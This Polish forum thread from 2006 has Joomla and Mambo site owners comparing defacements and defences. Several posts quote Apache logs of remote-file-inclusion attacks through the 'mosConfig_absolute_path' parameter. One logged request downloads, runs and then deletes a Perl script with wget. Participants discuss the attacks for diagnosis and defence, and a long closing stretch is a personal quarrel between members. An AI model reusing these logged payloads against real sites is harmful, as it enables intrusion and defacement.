PDA

Zobacz pełną wersję : Joomla dziurawa jak durszlak :-/



hazael
08-08-2006, 18:25
Wlasnie godzine temu 5 osob z poza naszego kraju zaatakowało moją witrynę i wyczysciły mi połowe plików z joomla. Zrobili to na moich oczach jak serwowałem po stronce. Dzwoniłem do admina, u którego mam postawiona witryne i z logów okazało się, ze wlam nastąpił poprzez panel administratora w systemie joomla. Jescze dziś bedę wiedział jakimi programami posługiwali się sprawcy i ktore pliki atakowali.

Ps. podobny atak nastąpił miesiąc temu na strone postawioną na mambo u mojego kumpla na osobnym serwerze - myslę, że to Ci sami sprawcy.

zwiastun
08-08-2006, 18:39
Faktom trudno przeczyć. A fakty sa też takie, że tysiące stron postawiono na Joomla. I stoją. Co nie znaczy, oczywiście, że ktoś dziury w całym nie znalazł. Ale skoroś już postraszył, to teraz dotrzymaj, coś obiecał, koniecznie!

hazael
08-08-2006, 18:41
no admin obiecal mi zrobic analize tego co bylo hackowane i jakimi progrmami. jescze dziś ma mi przeslac wyniki.

W kazdym razie kasują, lub zmieniają czesc plików tak, aby strona wyswietlała jedynie ich nicki. Mi podpisał sie gość w taki sposób:

owned by kainooo........ owned by kainooo........ owned by kainooo........ owned by kainooo........

ksiadz
08-08-2006, 19:14
trzeba, szukac serwerów z zainstalowanym mod security i wiele problemow sie rozwiazuje..

niestety takie rozwiazanie sporo "ssie" dlatego jest zadko instalowane:/

vj_
08-08-2006, 19:50
Pomijajac fakt tego co sie stalo powyzej, mozna tez zastosowac takie zabezpieczenia jak htaccess, poczytajcie sobie tutaj. (http://pomoc.ovh.pl/HtaccessRozne)

hazael
08-08-2006, 20:06
Jak się dowiedziałem, z logów wynika, że sa to ludzie z Turcji. Ale admin podważa ten fakt, bo strona z ktorej pobrali skrypty dzięki ktorymi dokonany zostal wlam jest z Polski. Pewnie polaczenie bylo przez elite proxy.

Dokładnie podmiana nastąpiła po wysłaniu POST (w logach 16:00:32), ponieważ dopiero po tym zabiegu zmienił się rozmiar głównego indexu:


194.165.130.93 - - [08/Aug/2006:15:59:20 +0200] "GET
/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http%3A%2 F%2Fxdaportal.info%2Fa%2F1.txt%3F&act=ls&d=%2Fhome%2Fwww%2Fserwis&sort=0a
HTTP/1.1" 200 6760
194.165.130.93 - - [08/Aug/2006:15:59:34 +0200] "GET
/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http%3A%2 F%2Fxdaportal.info%2Fa%2F1.txt%3F&act=ls&d=%2Fhome%2Fwww%2Fserwis%2Ftemplates&sort=0a
HTTP/1.1" 200 4891
194.165.130.93 - - [08/Aug/2006:15:59:47 +0200] "GET
/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http%3A%2 F%2Fxdaportal.info%2Fa%2F1.txt%3F&act=ls&d=%2Fhome%2Fwww%2Fserwis&sort=0a
HTTP/1.1" 200 6758
194.165.130.93 - - [08/Aug/2006:15:59:58 +0200] "GET
/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http%3A%2 F%2Fxdaportal.info%2Fa%2F1.txt%3F&act=f&f=index.php&ft=download&d=%2Fhome%2Fwww%2Fserwis
HTTP/1.1" 200 7210
194.165.130.93 - - [08/Aug/2006:16:00:06 +0200] "GET
/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http%3A%2 F%2Fxdaportal.info%2Fa%2F1.txt%3F&act=f&f=index.php&ft=edit&d=%2Fhome%2Fwww%2Fserwis
HTTP/1.1" 200 6921
194.165.130.93 - - [08/Aug/2006:16:00:32 +0200] "POST
/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http%3A%2 F%2Fxdaportal.info%2Fa%2F1.txt%3F&act=f&f=index.php&ft=edit&d=%2Fhome%2Fwww%2Fserwis%2F
HTTP/1.1" 200 4201
194.165.130.93 - - [08/Aug/2006:16:00:59 +0200] "GET
/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http%3A%2 F%2Fxdaportal.info%2Fa%2F1.txt%3F&act=ls&d=%2Fhome%2Fwww%2Fserwis%2F&sort=0aHTTP/1.1"
200 6759

Dziwne, bo wszystko idzie przez community bulider - moj kumpel nie posiada tego komponentu i ma mambo a jego strone podobnie shackowano - ci sami hackerzy sie podpisali...

hazael
08-08-2006, 21:03
w logach zostal slad - link do strony - na na niej jest umieszczony skrypt programu, za pomocą ktorego prawdopodobnie mozna dokonywac wlamu.

http://xdaportal.info/a/1.txt

jesli ktos qmaty w tej sprawie, proszę aby się temu przyjrzec.

sogo
08-08-2006, 21:08
mnie turki zrobiły kuku na dwóch stronach, w jednej joomla podmienili plik configuration.php i wyświetlała się ich stronka z waleczną muzyczką i osóbkami z kałachami w rączkach. Druga strona to podmiana pliku index.html na której było intro do joomla. Tak więc krzywdy wielkiej nie zrobili bo wystarczyło wgrać oryginalne pliki ponownie. Chmody były prawidłowo ustawione, zadziwia fakt, że tak łatwo można wejść na serwer i podmieniać pliki. Następny fakt wiąże się z najnowszym skryptem coppermine gallery, hosting zablokował mi ten skrypt bo nastąpiło przeciążenie ich serwera atakiem DOS, powodowało to wielki ruch z zapytaniam do bazy. Orzeczono wadę skryptu. Ten sam skrypt na krasnalu powodował ciągłe, nieustające komunikaty kaspersky`ego o ataku. Tak więc musiałem wycofać się z tej galerii.Na pocieszenie informacja, znajomemu w Kanadzie te same turki zrobiły to samo, tak więc to jakaś akcja ogólnoświatowa :).
pozdr.

hazael
08-08-2006, 21:12
bardzo ciekawe, tylko ze "Turki" mają ten skrypt na polskiej stronie, ktora jest wykonana w MAMBO. http://xdaportal.info - na pewno nie jest turecką stroną a z tego miejsca zostal dokonany atak na moją strone, mimo, ze identyfikowali sie z IP jako z Turcji. Jestem prawie pewny, że to Polacy podający sie za Turków.

sogo
08-08-2006, 21:19
nie mając pewności dlatego pisałem turki z małej litery :(

hazael
08-08-2006, 21:38
Moj kumpel przyznał się jednak, ze tez ma community bulider - czyzby to nie joomla a ten komponent?

Sogo, Ty też masz ten komponent?

sogo
08-08-2006, 21:45
nie, nie mam, ale włamy u mnie polegały na czym innym, nic nie uszkodzono jedynie podmieniono po jednym pliku.
pozdr.

hazael
08-08-2006, 21:47
no u kumpla zrobili podobnie - podmienili kilka plików w ktorych zostawili notkę o sobie. W przypadku mojej witryny wyczyscili wszystko co bylo umieszcozne w folderach. Pliki w głownym katalogu pozostawili a częśc podmienili, aby zostawić swoj podpis.

Teraz dokladniej przyjrzalem sie komponentowi i chyba raczej trudno obwiniac community bulider. W fragmencie POST, który wyzej podałem:
/administrator/components/com_comprofiler/plugin.class.php

nie ma pliku plugin.class.php

A teraz poczytajcie sobie ciekawy artykuł:
http://hack.pl/aktualnosci/tureccy_hackerzy_podmieniaja_polskie_strony_intern etowe_102

stone
08-08-2006, 22:07
U mnie sytuacja indentyczna jak u Sogo. Z tym że to jest strona jeszcze na starym mambo, więc mnie to nie dziwi, a nie mam na razie czasu sobie aktualizacji zapodać, wieć bawimy się w kotka i myszkę z nadpisywaniem ;)

Prośba, podajęcie swoje konfiguracje. Wersja joomli + ważniejsze dodatki

hazael
08-08-2006, 22:11
ale dziwne, bo ja mam ostatnią wersje Joomla z wszelkimi mozliwymi latkami i tez mnie pieknie przeczyszczono... :p

Admin mowil mi, ze mialem zmasowany atak, duzo atakow bylo pod kontem PHPnuke - moją strone podobno meczyli 2 godziny..

stone
08-08-2006, 22:14
Ale jak sam stwierdziłeś włam poszedł bokiem przez CB, zobacz na joomlapl.com tam była chyba ostatnio lista dziurawych dodatków
A CB masz w najnowszej wersji?

hazael
08-08-2006, 22:22
tak, cały czas na bieżaco sledze joomlapolis i jak tylko cos sie pokazuje, to od razu podpiemiam. W kazdym razie wg tych zapytan polaczonych z moim komponentem nie ma czegos takiego jak plugin.class.php jak dobrze pamientam, to bylo cos takiego w starej wersji. Poza tym, moja strona jest calkowicie zamknieta ten komponent jest jedynie dostepny po zalogowaniu sie na stronoe a wszelkie linki sa maskowane przez OpenSef. No ale jak ktos chce to moze wszystko... :-/

Chociaż z drugiej strony wszystko wskazuje jednak na ten komponent CB - wnioskując z artykułu Dziurawe komponenty zamieszoznego na http://joomlapl.com/ - widac nie został on wzięty pod uwagę, mimo tego ma dziurę bo podobnie jak w poprzednich przypadkach napisanych w artykule do ataku wykorzystywana jest niepoprawna weryfikacja parametru "mosConfig_absolute_path przed wykonaniem funkcji include dla innych plików. na poczatku postu atak wyglada podonie., tez wykorzystuje mosConfig_absolute_path

zwiastun
09-08-2006, 01:43
Z wiedzą na ten temat u mnie słabiutko, ale może tu jakies wyjasnienie:

http://www.gajdaw.pl/varia/xss.html

viper
10-08-2006, 12:05
JA też się spotkałem z turkami na jednej z moich stron. Joomla 1.03 bez CB .Niżej log z ataku , podmieniono plik konfiguracyjny oraz pare innych plików.

201.244.38.14 - - [10/Jul/2006:02:57:48 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mischel.cz/testy/autotaps/Fotografie/Velke/tool.gif?&cmd=cd%20/tmp/;wget%20http://www.mischel.cz/testy/autotaps/Fotografie/Velke/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0" 200 2371 "-" "Mozilla/5.0"

201.244.38.14 - - [10/Jul/2006:14:04:25 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mischel.cz/testy/autotaps/Fotografie/Velke/tool.gif?&cmd=cd%20/tmp/;wget%20http://www.mischel.cz/testy/autotaps/Fotografie/Velke/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0" 200 2371 "-" "Mozilla/5.0"
201.244.38.14 - - [10/Jul/2006:14:04:33 +0200] "GET

201.244.38.14 - - [10/Jul/2006:14:29:03 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mischel.cz/testy/autotaps/Fotografie/Velke/tool.gif?&cmd=cd%20/tmp/;wget%20http://www.mischel.cz/testy/autotaps/Fotografie/Velke/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0" 200 2371 "-" "Mozilla/5.0"

201.244.38.14 - - [10/Jul/2006:17:30:08 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mischel.cz/testy/autotaps/Fotografie/Velke/tool.gif?&cmd=cd%20/tmp/;wget%20http://www.mischel.cz/testy/autotaps/Fotografie/Velke/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0" 200 2371 "-" "Mozilla/5.0"
Środek naprawczy wykasowanie wszystkiego i przywrócenie danych z kopi zapasowej.
Do pliku .htaccess dopisane
Deny from 201.244.38 w celu blokady tego IP
Po adresie www.mischel.cz wygląda to na czeskich turków

vj_
10-08-2006, 12:25
Ostatnio z takimi przypadkami sie spotkalem na postnuke, w wersji jak mnie pamiec nie myli 0.7.5 - byla generalnie globalna panika, ludzie musieli - powtarzam MUSIELI - przeskoczyc na 7.6.1 - sam przenosilem i pomagalem jednemu koledze znajomego resuscytowac dwa serwisy, postawione na rzeczonym cmsie, pracy bylo co nie miara, bo baza sporo wazyla, niby teoretycznie tylko pozmieniali wpisy w pliku konfiguracyjnym - zamiast pojawic sie witrynka byla jakas strona turecka z powitalnych "ju w bin hakd by cos tam turkisz", ale z przenoszeniem i aktualizacja byl problem, bo tam akurat moduly nie wszystkie pasuja do nowszej wersji. Tak czy siak, jedyna mozliwoscia obrony czasami jest ustawianie wpisow w plikach konfiguracyjnych na sztywno, bez sciezek dostepu w postaci zmiennych, ale to jest sporo pracy bo trzeba wtedy modyfikowac nie jeden plik, choc mysle ze moze sie to oplacic, jesli ktos nie przewiduje pozniejszej aktualizacji oprogramowania tylko mutowanie swojej wlasnej wersji cmsa, czy to joomla,mambo,nuke'owate cmsy i inne.

rkubera
10-08-2006, 14:52
JA też się spotkałem z turkami na jednej z moich stron. Joomla 1.03 bez CB .Niżej log z ataku , podmieniono plik konfiguracyjny oraz pare innych plików.

Środek naprawczy wykasowanie wszystkiego i przywrócenie danych z kopi zapasowej.
Do pliku .htaccess dopisane w celu blokady tego IP
Po adresie www.mischel.cz (http://www.mischel.cz) wygląda to na czeskich turków

Z logów które przysłałeś to wynika że atak nastąpił przez podmianę globals i komponent com_content....
Polegał on chyba na tym,
że podmienili Ci pliki funcją wget po wywołaniu jej przez cmd z Twojego serwera.
Czyli nie pospuli bazy a tylko popodmieniali pliki tak?
to siedzi tu:
wget%20http://www.mischel.cz/testy/autotaps/Fotografie/Velke/mambo.txt;perl%20mambo.txt;
rm%20-rf%20mambo.*

tylko zamiast %20 zamień na spacje....
Sprawdzę to dziś wieczorem, bo spawa dosyć istotna - nawet chyba admina ani wejścia do backendu nie trzeba ...

Rybik
10-08-2006, 22:29
Bardzo prosze podac pozniej (o ile sie da) rozwiazanie w formie ogolnej, tzn jakie elementy, ustawienia serwera, chmody, czy co tam jeszcze moze byc istotne sa powodem powstawania takiej furtki.

:)
No i oczywiscie kto ma , niech podaje numery IP

stone
10-08-2006, 22:29
Ukazała się krytyczna łatka do CB, szczegóły tutaj http://www.joomlapolis.com/

rkubera
11-08-2006, 00:10
No cóż, próbowałem, ale u mnie nie przeszło.
Położyłsię już na globals:
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=blebleble

Mam register_globals na off i załadowany mod_security.
Pozdrawiam.

P.S. Problem z CB też jest w przypadku włączonych globalsów....

viper
11-08-2006, 00:15
@rkubera
oprucz pliku konfiguracyjnego pozmieniali pare innych , bo po wgraniu pliku konfiguracyjnego dalej strona wyświetlała co innego niż miało to być. Nie mam tego przy sobie bo zrzut mam na innym kompie więc nic więcej nie podam w tej sprawie. Chmody konfigu miałem ok ale i tak to obeszli.

rkubera
11-08-2006, 00:18
Tak,
bo zrobili to tak:
- wgrali Ci na serwer skrypt napisany w perlu
- wykonali go (on mógł też pozmieniać chmody)
- i wyczyścili się

Ale mam wrażenie, że ten serwer czeski (http://www.mischel.cz/) musiał być w to zamieszany bo
tam znajdował się ten perlowy skrypt.... Chyba że najpiwerw włamali się do nich.
Tak czy inaczej wget wskazuje na ich serwer...

viper
11-08-2006, 00:21
@rkubera
oprucz pliku konfiguracyjnego pozmieniali pare innych , bo po wgraniu pliku konfiguracyjnego dalej strona wyświetlała co innego niż miało to być. Nie mam tego przy sobie bo zrzut mam na innym kompie więc nic więcej nie podam w tej sprawie. Chmody konfigu miałem ok ale i tak to obeszli.

Sova
11-08-2006, 19:48
Heh... mnie też nie ominęło - a myślałem, ze miło wakacje spędzę. Nie wiem jeszcze jak i skąd nastąpił włam - wakacje poza domkiem (a hasełko do bazy się kłania). Jedynym fartem było to, że był backup 2 dni wczesniej
.
Co zepsuli?

Na szczęście jedynie index.php - wyczyszczony do cna i wstawiony text: "Hacked by CyberLord"


Specyfikacja serwisu:
Joomla 1.0.8
--------------------
KOMPONENTY:
-AkoBook
-ArtBanners
-Bookmarks
-JCE
-Generator mapy Google
-Graphitory
-Imagelinks
-Joomap
-Joomlaxlporer
-Recommend
-Remository
-SimpleFAQ
-Reszta jak w standardzie

I jak sie dostał/li ?
Więcej info wkrótce-czyli zaraz jak skończę urlop...

rkubera
11-08-2006, 20:48
Polecam:
http://forum.joomla.org/index.php?topic=27412.0;prev_next=next

Jeżeli to ten sam włam... Masz logi z apache?

Sova
12-08-2006, 18:39
No to chyba wiem jak się dostali... Remository. Z panelu admina nie mogę się dostać, popatrzyłem ftp'em i faktycznie - ostatnia edycja administator/components/com_remository oczywiście z dnia włamu.
-----------------------
Takie pytanko na szybko (tak ja wspominałem, siedzę na urlopie i nie mam zbyt często dostępu do netu, aby znaleźć co potrzeba):
Aby zaktualizować Remository do najnowszej wersji należy odinstalować obecną wersję i wgrać nową, czy wystarczy w celu aktualizacji tylko nadpisać pliki?
Wdzięczny będę - dzięki!

josh
12-08-2006, 19:35
@Sova, zalezy z kotrej wersji przechodzisz jak z nizszej niz 3.2o to moga byc problemy
z wyzszych mi poszlo sprawnie,
na 100% zieniony plik admin.remository.php reszty nie sprawdzalem wiec pewnie wystarczy ten zamienic

Sova
12-08-2006, 19:39
Wersja 3.21 - sugerujesz aby podmienić tylko admin.remository.php a reszty nie tykać? Hmm...

josh
12-08-2006, 20:02
mi z 3.24 poszlo bez problemow deinstalacja i instalacja nowej wersji, zawsze masz backup jakby co :D

Sova
12-08-2006, 20:21
No to teraz ciekawostka-nadpisałem admin.remository.php z najnowszej paczuszki R3.26 i w konfiguracji Remository podaje mi wersję 3.24 :confused:. No i o co chodzi? Chyba jednak trzeba zrobić reinstall na nową wersję...

josh
12-08-2006, 20:32
info o wersji jest zaszyte w innym pliku

pozdr

Sova
12-08-2006, 20:38
No to podziękować za info!
Pozdr

josh
12-08-2006, 21:33
chciales przeciez zabezpieczyc remosa przed wlamem, o numerku wyswietlanej wersji nic nie bylo mowy :)

pozdr

viper
14-08-2006, 23:40
Proponuje przeczytać ten artykół Blokowanie exploitów przy pomocy .htaccess (http://www.joomlapl.com/content/view/179/26/) oraz zaglądnąć na strone zone-h (http://www.zone-h.org/component/option,com_frontpage/Itemid,1/)

Sova
15-08-2006, 01:12
Przeczytałem - ciekawe bardzo. No więc chciałem tak zrobić i... "Internal server error" - czyli pozamiatane.......

Sova
16-08-2006, 01:33
Viper! Taka ciekawostka - już wiem czemu ten "internal.." W artykule błąd macie, a dokładnie w kodzie do wpisania... <Files/> na </Files> chyba, no nie?

viper
16-08-2006, 10:57
Viper! Taka ciekawostka - już wiem czemu ten "internal.." W artykule błąd macie, a dokładnie w kodzie do wpisania... <Files/> na </Files> chyba, no nie?
Nie jestem autorem tego arta ale umnie wszystko chodzi ok tak jak jest napisane w tym arcie

Sova
16-08-2006, 12:41
No właśnie nie wiem.... po zmianie będu wczytywania strony nie mam

jokris
16-08-2006, 18:31
No właśnie nie wiem.... po zmianie będu wczytywania strony nie mam No właśnie Sova.....Hm......Ciekawe dlaczego?:eek:. A co do vipera (http://member.php?u=63) który pisał wcześniej, że mu w takiej postaci, jak w artykule na JoomlaPl.com, stronka chodzi, to nie pomylił czasem pliku .htaccess z htaccess.txt. Odsyłam do postu na forum.joomla.org (http://forum.joomla.org/index.php/topic,17373.msg106591.html#msg106591), gdzie jest właśnie cytowany wcześniej kod. Nie zamykając znacznika, blokujesz wszystkich, a nie tylko pliki. Zajrzyj tam. No ale miałem tu nie pisać, więc spadam. Pozdro dla uczestników forum, i moich kolegów.:)

viper
17-08-2006, 00:22
.... to nie pomylił czasem pliku .htaccess z htaccess.txt.

Plików nie pomyliłem :cool:
A co do
blokujesz wszystkich, a nie tylko pliki. jak bym wszystkich blokował to i siebie a tak nie jest.

zwiastun
17-08-2006, 01:00
No ale miałem tu nie pisać, więc spadam. Pozdro dla uczestników forum, i moich kolegów.:)
Jokris, proszę - po prostu nie pisz! Nie musisz.
Co nie znaczy, że nie jesteś tu mile widziany. Wręcz przeciwnie. Jak każdy zresztą. A że masz wiedzę, którą możesz podzielić się z innymi, tym bardziej warto byś znalazł czas i... wolę.
Nie dla mnie przecie czy innych zarządzających forum, a dla użytkowników

Ale fobie zachowaj dla siebie.
Ad. viper

Nie jestem autorem tego arta ale u mnie wszystko chodzi ok tak jak jest napisane w tym arcie Sova i slusznie - zwrócił uwagę na sposób zamnięcia znacznika </Files> - ukośnik po ostrym nawiasie otwierającym.

jokris
17-08-2006, 04:45
Zwiastun, tylko ze względu na szacunek dla ciebie, musiałem coś napisać na forum, chociaż po wątku "Galeria zestawienie", gdzie jeden z adminów tak pisze o mnie:

Czy to aluzja, po czesci tak, do ludkow, ktorzy rok temu pytali na forum o kazda pierdółkę "jak to zrobic" a w tej chwili promuja wlasne strony. Jokris napisal raptem 18 postow z czego w polowa zawiera jakies tresci merytoryczne a reszta dotyczy prywatnych wywodow na temat administracji tego forum. W wiekszosci z nich oczywiscie reklamuje swoja strone. odechciewa mi się wszystkiego. Tak dosłownie. Ja rok temu jeszcze nie miałem Internetu, co dopiero pisać o Joomla czy Mambo. Nie znałem takich pojęć. Z zawodu jestem elektronikiem, i zajmowałem się naprawą komputerów. Tak naprawdę, to gdzieś od lutego tego roku zacząłem poznawać systemy CMS, i uczyć się PHP. Taki to ze mnie "ludek". Nie chciałbym się tutaj użalać nad sobą, ale ja naprawdę robię wszystko z doskoku, w biegu, w związku z moim stanem zdrowia. Niech ten, o którego chodzi, wskaże mi wątek, w którym ja pytałem o jakąś "pierdółkę". Obecnie dostaję około dziesięciu maili dziennie, z pytaniami dotyczącymi Joomla i Mambo, i muszę chociaż na część z nich odpowiadać, bo tak mnie tata i mama nauczyli w 60-tych latach mojego dzieciństwa. Nauczyli mnie tez szacunku dla starszych, i pomocy dla innych. Urodziłem się w 60 roku zeszłego wieku, i takich ludzi, cytowanych wyżej, nie było jeszcze na świecie. A teraz jestem dla niego "ludkiem". Ja nie rozumiem tego jego języka, mam swoja dumę, i to nie są fobie, Zwiastun. Moja niechęć do tego forum wynika właśnie ze stylu, w jakim są prowadzone dyskusje. Czyż cytowany wyżej wątek, a właściwie znaczna jego część to nie były prywatne wywody?. Dlaczego ten człowiek nie może zrozumieć, że ja robię wszystko sam, i może nie jestem najlepszy w angielskim (inny wątek), ale staram się jak mogę. A jak dobrze poczytasz wątek "Link do menu administratora usunąłem" to tym bardziej zrozumiesz moją awersję do forum. Człowiek(nie ludek) zapytał, co ma zrobić, bo usunął, będąc w panelu admina, odnośnik do administratora w menu, wylogował się, i po prostu nie wiedział jak się tam spowrotem dostać. Czyli to tak, jakbyś wyszedł z domu, zatrzasnął drzwi, a klucze zostały w przedpokoju. Wzywasz ślusarza?. Możesz wejść przez okno, ale może nie wiesz, jak to zrobić. I właśnie tutaj "ten niedobry", proponuje mu, żeby spowrotem wszedł przez drzwi, najlepiej poprzez szparę w drzwiach, lub przez dziurkę od klucza. Jakby nierozumiał sedna rzeczy. Stąd moja nerwowa reakcja na jego odpowiedź. Ja zaproponowałem Człowiekowi drugie wejście. Nieważne czy z "/" na końcu, czy bez, ale podstawiłem mu tę drabinę do okna, żeby mógł wejść do domu, i tam dopiero naprawić swój błąd. Takich jego odpowiedzi są setki, a "ten niedobry", z tego, co mogę się domyślać, nie robi nic innego, poza pracą na forum. Nie widzę go w adaptacjach językowych, w tworzeniu nowych komponentów, czy modułów. Ja wiem, że odpowiadanie na ciągle te same pytania może w końcu doprowadzić do, może i "furii", ale są i inni, jak ty, Zwiastun, czy Dylek, Josh, i wielu innych, którzy piszą krótko, a zwięźle. Na temat. Co do reklamowania mojej strony, to co?. Nie wolno?. A co robi JoomlaPl.com. Reklamuje "silikonki", a ja co reklamuję. Np galerę PAXXGallery, i to w dwóch wersjach, a to nie są "silikonki". To jest owoc moje wielotygodniowej pracy, często po nocach. Znasz to, bo sam jesteś "pracoholikiem". I to są fobie?. Będę brutalny w stosunku do mojego partnera, Sovy, i muszę napisać, że nieładnie, jak się wykorzystuje czyjeś artykuły, nie pisząc, kto jest ich autorem. Stąd moje "Hm.....". Odsyłam do mojego artykułu (http://www.jokris.info/index.php?option=com_remository&Itemid=28&func=fileinfo&id=104), wprawdzie w ReMOSitory, ale właśnie tam jest zwrócenie uwagi, na nieprawidłowy kod na JoomlaPl.com., odnośnie pliku ".htaccess". Artykuł powstał 15-stego, tego miesiąca, a mój kolega jest częstym gościem na mojej stronie. Nie pisząc już o wykradaniu pomysłów przez JoomlaPl.com, dotyczących bota " Jogadgets", gdzie bot ów był opublikowany na mojej stronie w chwilę po jego powstaniu, czyli gdzieś około miesiąca temu, łącznie z przykładami, co każdy odwiedzający moją stroną może potwierdzić. Bot był spolonizowany, czyli grafiki po polsku, tylko nie miałem czasu wrzucić go do plikowni, podobnie jak komponent "Web Tools", który też mam gotowy, nowa wersje Gadu-Gadu-Kontakt, zmodyfikowana księgę "AkoBook V3.42++" (gotowa też prawie miesiąc temu) ze wsparciem dla GG, Tlena, Skype, Spika, Icq (wszystko ze statusami, i nie zamienione za np.aol, tylko dodane do bazy SQL, do admina jako nowe), i jeszcze kilka innych.. A tu JoomlaPl.com, cytuję" Uzupełniono o polski tekst i grafiki występujące w galerii (komunikaty: zamknij, dalej, wstecz).". Trochę nieładnie. Nie uważasz. Oczywiście ich prawo. Ale gdzie jest ta solidarność, złożona z czterech kolorów, o której ty gdzieś tam tak ładnie pisałeś. Ale o bota się nie martwię, bo to jest wersja całkowicie odmieniona(ta moja, 4a), czyli instalacja w pełni zautomatyzowana, i dodatkowo na Joomlapl.com nie wiedzą jak zrobić kolorowe "Dymki", a ja wiem.:cool:. Wersję 4.3.a też zrobię. Zwiastun, ja mam setki pomysłów, tylko nie mam czasu na ich realizację. Nikt mi nie pomaga, a, że będę się powtarzał, "ten niedobry" nazywa mnie ludkiem, czyli kim?. Podczłowiekiem?. Plebsem?. Nie będę wymieniał dalszych zamienników. Jesteś polonistą, to wiesz, co niektóre słowa oznaczają. I Zwiastun na koniec. Podtrzymuję swoja decyzję, że nie będę pisał na tym forum, chyba ze niektórzy ludzie odejdą z niego. A to może być nigdy. Pisałem wcześniejszy post tylko ze względu na mojego kolegę. Uważam, ze jesteś człowiekiem najbardziej oddanym idei Joomla, szanuję cię za twoją pracę, bo jesteś obecny w większości projektów. Twoje "cegiełki" są wszędzie, i myślę, że moich tez nie zabraknie. Oczywiście innych też doceniam, i dlatego pozdrawiam Polskie Centrum Joomla!!. P.s. Mógłbyś chociaż odpowiadać na moje maile pisane na Joomla.pl, bo chyba mnie nie banujesz?. Cześć.:):):)

zwiastun
17-08-2006, 06:48
1. Mail dotarł jeden, odpowiedziałem pytałem o zdrowie, nie było odpowiedzi...
hmm może cosik na łączach...
2. Obciążenie przywracaniem do życia joomlademo.pl powoduje, że paru rzeczy nie jestem w stanie zrobić.
3. Na "podkradanie", jeśli widzę, reaguję, choć nie zawsze i nie wszędzie, bo ręce czasem opadają. Przyjmuję, że źródłem nie zawsze są złe intencje, czasem niefrasobliwość, czasem zlekceważenie pewnych rzeczy, czasem złe rozumienie licencji. Różnie bywa. Ale w swoim gronie to sądzę, że można stawiać sprawy wprost : Jaśku, toś zrobił źle, bo żalami czy pretensjami naokoło skutku sie nie osiągnie, a jeszcze się ludziska poobrażają
4. Umyślnie napisałem powyżej ludziska, by nawiązać do stylu "niedobrego". Znajdź czas i popatrz, ile ów "niedobry" rzeczywiście "ludkom" pomógł, i że go za to cenią. Wbrew temu co może widać, aktualnie jego udział od kilku miesięcy w pracach PCJ jest ogromny. Jak każdemu, zdarza się i mnie, i jemu, przesadzić (wszyscy mamy jakieś fobie czy "okresy").

Ale jeśli zaczniesz od punktu wyjścia, to: gdy tu czy gdzieś indziej ktoś coś robi na zasadach wolontariatu dla innych, to przecie z założenia samego nie po to, by im nie pomóc, wyrządzic przykrość, dopiec. Nie widzimy człowieka, próbujemy znajdować, każdy na swój sposób, jakiś styl porozumienia trochę na luzie, a język pisany ma niestety to do siebie, że nie wszystko przekazuje i może być różnie interpretowany, także i zależnie od nastroju aktualnego, i własnych o sobie wyobrażeń, i własnych interpretacji pewnych pojęć, i własnego wyobrażenia o tym, jaka gdzieś obowiązuje konwencja. ITD.
Gdybym mial się czuć urażony z powodu różnych pretensji (słusznych i niesłusznych) choćby na tym forum, to juz dawno zacząłbym chodzić do ogródka, zamiast zajmować się Joomla.
Buuu, miało być krótko.

To w tej mierze dodam jeszcze, że rzeczywiście, powtarzanie po raz -nty tego samego należy do najbardziej irytujących sytuacji.

Zważ wszakże, że pierwszym źródłem irytacji jest JEDNAK niespełnienie w takich przypadkach warunków podstawowych pisania na forum, zwracania się o pomoc: poczytaj, poszukaj w instrukcjach, użyj szukajki na forum, podaj podstawowe informacje
I jest to coraz powszechniejsze zjawisko.
Z jednej strony trzeba takie sytuacje rozumieć, bo ktoś kto zaczyna, to nie wie niekiedy ani gdzie szukać, ani jak szukać, ani jakiego języka użyć w swoim poście. Tylko że to naprawdę jego problem.

Minął niemal rok od mojego pierwszego kontaktu z mambo, zanim kiedyś zdecydowałem się zabrać głos na forum, myśląc kategoriami: nie będę przecież ludziom, którzy mi oferują pomoc, zajmował czasu dlatego, że mi się spieszy, że mi się nie chce, że moja wiedza jest niewystarczająca. I nie było wtedy całego polskiego zaplecza, które dziś jest na "kliknięcie" myszką.

Dziś młody człek siada do kompa, ściąga Joomla, instaluje i krzyczy na forum, że to jest nie tak, tamto nie siak. Po 10 minutach, po godzinie, po 2 dniach, po tygodniu nawet. Nieważny czas - ważne że nie poznał i uważa, że po to są fora, by takim jak on odpowiadać na pytania banalne
...
Stąd może i irytujące pouczenia. Stąd może i irytujące poszukaj, stąd czasem odpowiedzi, które mają zmusić pytającego, by odrobił swoje zadanie domowe najpierw. Że jest niezadowolony, że się poczuje urażony.. No cóż, szkoda. Ale to jego problem! Nie przychodzi do firmy, której płaci, nie przychodzi do instytucji, od której mu się coś należy, zwraca się do ludzi, których nie zna, którzy oferują mu pomoc pod pewnymi warunkami (regulamin forum czy ogólne zasady korzystania z forów), do ludzi dobrej woli, których ma traktowac POWAŻNIE, a nie jak dzieciak, ktory czasem potrafi jeszcze najkrócej mówiąc popyszczyć, że ktoś go zlekceważył, nie dał, co mu się słusznie nalezy. A co mu się należy?

I na koniec, chyba nie sądzisz, że jesli któryś z nas przeholuje, to nie obrywa? Każdy! "Niedobry" też, ja też. Nie chdzi oczywiście o reprymendy użytkowników, ale o wzajemne.

